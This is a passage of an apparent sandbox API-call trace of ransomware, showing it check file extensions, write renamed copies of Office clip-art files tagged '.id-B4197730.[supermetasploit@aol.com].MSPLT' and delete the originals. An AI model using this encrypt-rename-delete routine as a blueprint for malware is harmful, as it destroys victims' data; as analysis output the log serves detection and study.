lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.289] SetEndOfFile (hFile=0x44c) returned 1 [0299.289] CloseHandle (hObject=0x44c) returned 1 [0299.290] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.290] SetEndOfFile (hFile=0x480) returned 1 [0299.293] CloseHandle (hObject=0x480) returned 1 [0299.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.296] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00105_.wmf")) returned 1 [0299.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.296] lstrlenW (lpString=".doc") returned 4 [0299.296] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.296] lstrlenW (lpString=".docx") returned 5 [0299.296] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.296] lstrlenW (lpString=".pdf") returned 4 [0299.296] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString=".xls") returned 4 [0299.297] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.297] lstrlenW (lpString=".xlsx") returned 5 [0299.297] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.297] lstrlenW (lpString=".ppt") returned 4 [0299.297] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString=".zip") returned 4 [0299.297] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.297] lstrlenW (lpString=".rar") returned 4 [0299.297] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString=".bz2") returned 4 [0299.297] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString=".7z") returned 3 [0299.297] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString=".dbf") returned 4 [0299.297] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString=".1cd") returned 4 [0299.297] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString=".jpg") returned 4 [0299.297] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.297] lstrlenW (lpString=".doc") returned 4 [0299.297] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.297] lstrlenW (lpString=".docx") returned 5 [0299.298] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.298] lstrlenW (lpString=".pdf") returned 4 [0299.298] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString=".xls") returned 4 [0299.298] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.298] lstrlenW (lpString=".xlsx") returned 5 [0299.298] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.298] lstrlenW (lpString=".ppt") returned 4 [0299.298] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.298] lstrlenW (lpString=".zip") returned 4 [0299.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.298] lstrlenW (lpString=".rar") returned 4 [0299.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString=".bz2") returned 4 [0299.298] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString=".7z") returned 3 [0299.298] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.298] lstrlenW (lpString=".dbf") returned 4 [0299.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.298] lstrlenW (lpString=".1cd") returned 4 [0299.298] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.298] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 68 [0299.298] lstrlenW (lpString=".jpg") returned 4 [0299.298] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.299] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.299] lstrlenW (lpString="BL00130_.WMF") returned 12 [0299.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.300] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1464) returned 1 [0299.300] CloseHandle (hObject=0x480) returned 1 [0299.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf")) returned 0x220 [0299.300] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.301] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.301] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0299.301] GetLastError () returned 0x0 [0299.302] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x5b8, lpOverlapped=0x0) returned 1 [0299.303] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x5c0, lpOverlapped=0x0) returned 1 [0299.305] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.305] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.305] SetEndOfFile (hFile=0x44c) returned 1 [0299.305] CloseHandle (hObject=0x44c) returned 1 [0299.308] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.308] SetEndOfFile (hFile=0x480) returned 1 [0299.311] CloseHandle (hObject=0x480) returned 1 [0299.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0299.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.313] lstrlenW (lpString=".doc") returned 4 [0299.313] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.313] lstrlenW (lpString=".docx") returned 5 [0299.313] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.313] lstrlenW (lpString=".pdf") returned 4 [0299.313] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.313] lstrlenW (lpString=".xls") returned 4 [0299.313] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.313] lstrlenW (lpString=".xlsx") returned 5 [0299.313] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.313] lstrlenW (lpString=".ppt") returned 4 [0299.313] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString=".zip") returned 4 [0299.314] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.314] lstrlenW (lpString=".rar") returned 4 [0299.314] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString=".bz2") returned 4 [0299.314] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString=".7z") returned 3 [0299.314] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString=".dbf") returned 4 [0299.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString=".1cd") returned 4 [0299.314] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString=".jpg") returned 4 [0299.314] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.314] lstrlenW (lpString=".doc") returned 4 [0299.314] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString=".docx") returned 5 [0299.314] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.314] lstrlenW (lpString=".pdf") returned 4 [0299.314] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.314] lstrlenW (lpString=".xls") returned 4 [0299.314] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.314] lstrlenW (lpString=".xlsx") returned 5 [0299.314] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.315] lstrlenW (lpString=".ppt") returned 4 [0299.315] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.315] lstrlenW (lpString=".zip") returned 4 [0299.315] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.315] lstrlenW (lpString=".rar") returned 4 [0299.315] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.315] lstrlenW (lpString=".bz2") returned 4 [0299.315] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.315] lstrlenW (lpString=".7z") returned 3 [0299.315] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.315] lstrlenW (lpString=".dbf") returned 4 [0299.315] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.315] lstrlenW (lpString=".1cd") returned 4 [0299.315] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 68 [0299.315] lstrlenW (lpString=".jpg") returned 4 [0299.315] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.315] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.315] lstrlenW (lpString="BL00148_.WMF") returned 12 [0299.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.317] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1696) returned 1 [0299.317] CloseHandle (hObject=0x480) returned 1 [0299.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf")) returned 0x220 [0299.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0299.318] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.318] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0299.318] GetLastError () returned 0x0 [0299.318] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x6a0, lpOverlapped=0x0) returned 1 [0299.612] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x6b0, lpOverlapped=0x0) returned 1 [0299.614] ReadFile (in: hFile=0x480, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.614] WriteFile (in: hFile=0x44c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.614] SetEndOfFile (hFile=0x44c) returned 1 [0299.615] CloseHandle (hObject=0x44c) returned 1 [0299.618] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.618] SetEndOfFile (hFile=0x480) returned 1 [0299.622] CloseHandle (hObject=0x480) returned 1 [0299.622] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0300.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00148_.wmf")) returned 1 [0301.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.102] lstrlenW (lpString=".doc") returned 4 [0301.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.102] lstrlenW (lpString=".docx") returned 5 [0301.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.102] lstrlenW (lpString=".pdf") returned 4 [0301.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.102] lstrlenW (lpString=".xls") returned 4 [0301.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.103] lstrlenW (lpString=".xlsx") returned 5 [0301.103] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.103] lstrlenW (lpString=".ppt") returned 4 [0301.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.103] lstrlenW (lpString=".zip") returned 4 [0301.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.103] lstrlenW (lpString=".rar") returned 4 [0301.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString=".bz2") returned 4 [0301.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString=".7z") returned 3 [0301.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.103] lstrlenW (lpString=".dbf") returned 4 [0301.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.103] lstrlenW (lpString=".1cd") returned 4 [0301.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.103] lstrlenW (lpString=".jpg") returned 4 [0301.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.104] lstrlenW (lpString=".doc") returned 4 [0301.104] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.104] lstrlenW (lpString=".docx") returned 5 [0301.104] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.104] lstrlenW (lpString=".pdf") returned 4 [0301.104] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.104] lstrlenW (lpString=".xls") returned 4 [0301.104] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.104] lstrlenW (lpString=".xlsx") returned 5 [0301.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.104] lstrlenW (lpString=".ppt") returned 4 [0301.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.104] lstrlenW (lpString=".zip") returned 4 [0301.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.104] lstrlenW (lpString=".rar") returned 4 [0301.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.105] lstrlenW (lpString=".bz2") returned 4 [0301.105] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.105] lstrlenW (lpString=".7z") returned 3 [0301.105] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.105] lstrlenW (lpString=".dbf") returned 4 [0301.105] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.105] lstrlenW (lpString=".1cd") returned 4 [0301.105] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.105] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 68 [0301.105] lstrlenW (lpString=".jpg") returned 4 [0301.105] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.105] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0301.105] lstrlenW (lpString="BL00265_.WMF") returned 12 [0301.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0303.470] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=5752) returned 1 [0303.470] CloseHandle (hObject=0x4c0) returned 1 [0303.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf")) returned 0x220 [0303.471] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0303.472] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.472] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00265_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00265_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.477] GetLastError () returned 0x0 [0303.477] ReadFile (in: hFile=0x4c0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1678, lpOverlapped=0x0) returned 1 [0303.485] WriteFile (in: hFile=0x4f8, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1680, lpOverlapped=0x0) returned 1 [0303.486] ReadFile (in: hFile=0x4c0, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.487] WriteFile (in: hFile=0x4f8, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0303.487] SetEndOfFile (hFile=0x4f8) returned 1 [0303.487] CloseHandle (hObject=0x4f8) returned 1 [0303.492] SetFilePointerEx (in: hFile=0x4c0, 